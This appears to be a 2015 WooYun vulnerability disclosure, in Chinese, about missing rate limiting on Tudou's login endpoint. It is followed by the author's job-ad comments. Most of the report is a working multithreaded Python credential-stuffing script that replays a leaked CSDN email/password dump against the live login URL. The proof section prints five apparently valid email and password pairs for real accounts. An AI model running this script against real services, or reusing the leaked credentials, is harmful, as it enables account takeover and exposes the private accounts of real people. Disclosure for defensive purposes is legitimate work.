当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0121803

漏洞标题:土豆某处设计缺陷存在撞库

相关厂商:土豆网

漏洞作者: jaffer

提交时间:2015-06-23 18:18

修复时间:2015-08-07 18:42

公开时间:2015-08-07 18:42

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-23: 细节已通知厂商并且等待厂商处理中
2015-06-23: 厂商已经确认,细节仅向厂商公开
2015-07-03: 细节向核心白帽子及相关领域专家公开
2015-07-13: 细节向普通白帽子公开
2015-07-23: 细节向实习白帽子公开
2015-08-07: 细节向公众公开

简要描述:

rt

详细说明:

接口:

http://login.tudou.com//passport/ytLogin.do?jsoncallback=jQuery17203996445555239916_1434721317917&loginname=test&passwd=test&remember=1&from=http%3A%2F%2F114.80.122.152%3A8080%2F&_=1434721510212'


对loginame和passwd进行爆破,没有限制,但是当重复提交次数超过500以上(具体多少没测试)会将IP地址进行限制。但是过一段时间又会解除限制。
python fuzz代码:

#!/usr/bin/env python
#-*-coding:utf-8-*-
import httplib2
import urllib2
import urllib
import socket
import socks
from urllib import urlopen
from string import replace,find,lower
from httplib import HTTPException
from urllib import urlencode
import time
import threadpool
import threading
import pdb
import traceback  
pdb.set_trace()
mutex = threading.Lock()
class fuzz(object):
	def __init__(self,user_pwd,count):
		self.user_pwd = user_pwd
		self.good = []
		self.count = count
		self.threadnum = 10
	def makePackage(self,euser,epwd):
		url = 'http://login.tudou.com//passport/ytLogin.do?jsoncallback=jQuery17203996445555239916_1434721317917&loginname='+euser+'&passwd='+epwd+'&remember=1&from=http%3A%2F%2F114.80.122.152%3A8080%2F&_=1434721510212'
		headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36',
		'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8'}
		
		h = httplib2.Http()
		try:
			res,con = h.request(url)
			
		except Exception,ex:
			print Exception,":",ex
			traceback.print_exc()  
			return
		i = con.find('success')
		t = []
		if i != -1:
			if mutex.acquire():
				self.good.append([euser,epwd])
				print euser+':'+epwd+'\n'			
				mutex.release()
		else:
			pass
	
	def preS(self):
		base = 0
		for each in self.user_pwd:
			self.makePackage(each[0],each[1][0:-1])
			if mutex.acquire():
				if len(self.good) != base:
					self.save()
					base = len(self.good)	
				mutex.release()
	
	def save(self):
		fp = open('result','w')
		for each in self.good:
			fp.writelines(each[0]+' '+each[1]+'\n')
		fp.close()
	
	def gothread(self):
		#建立进程池
		pool = threadpool.ThreadPool(self.threadnum)
		#两个list合并,直接相加就可以
		count = 0
		base = 0
		for i in range(self.count):
			print self.user_pwd[i][0]+'----user-----\n' + self.user_pwd[i][1] + '---pass---\n'
			if mutex.acquire():
				if len(self.good) != base:
					self.save()
					print 'OK\n'
					base = len(self.good)	
				mutex.release()
			pool.add_task(self.makePackage,self.user_pwd[i][0],self.user_pwd[i][1])
		#join and destroy all threads
		pool.destroy()
	
if __name__=='__main__':
	f = open('csdn_email','r')
	up = []
	count = 0
	while True:
		line = f.readline()
		if line:
			i = line.find(' ')
			user = line[0:i]
			pwd = line[i+1:]
			up.append([user,pwd])
			count = count + 1
		else:
			break
	f.close()
	test = fuzz(up,count)
	test.preS()

漏洞证明:

因为只测试一次,用csdn邮箱以及密码进行测试。
经过一轮测试得到的有效的用户密码:
fstao@tom.com 730413
jamstang@163.com jamstang
littlesong73@163.com Swhy920520
horseplay@126.com my1316pass
gggxin@126.com xinghong

1.png


2.jpg


3.jpg


4.png


修复方案:

防撞库

版权声明:转载请注明来源 jaffer@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-06-23 18:40

厂商回复:

已知问题,多谢。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-09-24 14:33 | jaffer ( 实习白帽子 | Rank:87 漏洞数:24 )

    网络安全专家招聘信息:1、职位名称:网络安全技术专家2、所属部门:XX公司(深圳的世界五百强通信企业)3、部门员工数:50004、下属人数:项目负责制,下属人数不固定网络运营管理正在变化的台风口,内外部环境瞬息万变,网络安全正在面临巨大考验,世界各国均十分重视,对从业者是一个广阔空间、无限机遇、充满挑战且不断变化的领域。该岗位能充分发挥人才的技术特长,一方面可成长为公司内部该领域的引领者,另一方面随着公司在OSS领域的发展而提升人才在OSS领域业界安全的影响力。

  2. 2015-09-24 14:34 | jaffer ( 实习白帽子 | Rank:87 漏洞数:24 )

    岗位职责:1.作为产品高端专家,针对网络运营管理产品,完成端到端安全解决方案、安全架构的提供和部署。在产品侧主导将安全功能、网络及基础设施转变为服务,转化为一切即服务(XaaS)解决方案,为产品客户能够预防安全风险、快速识别、消减安全风险。2.握网络安全技术的演进方向和发展趋势,识别关键安全性核心技术,具备大型软件系统安全性业务/技术规划能力,助力该业务领域安全性竞争力提前布局和储备。

  3. 2015-09-24 14:34 | jaffer ( 实习白帽子 | Rank:87 漏洞数:24 )

    候选人条件:1. 具备成功开展跨产品族多个产品/重点版本的E2E安全性活动的经验,产品关键安全性质量属性达到业界领先水平。2. 熟练掌握相关产品管理、网络安全工程方法、网络安全关键技术、网络安全评估等相关知识和工作经验,并具备对团队网络安全设计进行领导的经验。3. 具备研究业界成熟的安全保障体系模型与实现方法的经验,熟悉虚拟化、云化、OS、DB、防病毒、IDS/IPS、攻防、 Web安全等相关技术及产品应用。4. 本科以上学历,不少于8年的领域工作经历(硕士/博士可适当放宽),有较强的学习能力,良好的沟通协调能力,英语可作为工作语言。联系方式:18681480997 (刘先生)联系邮箱:liupeng923@163.com我们能够提供的职位:网络安全专家工作地点:要求国内(深圳、北京、上海、西安、南京、杭州、武汉、深圳、成都、)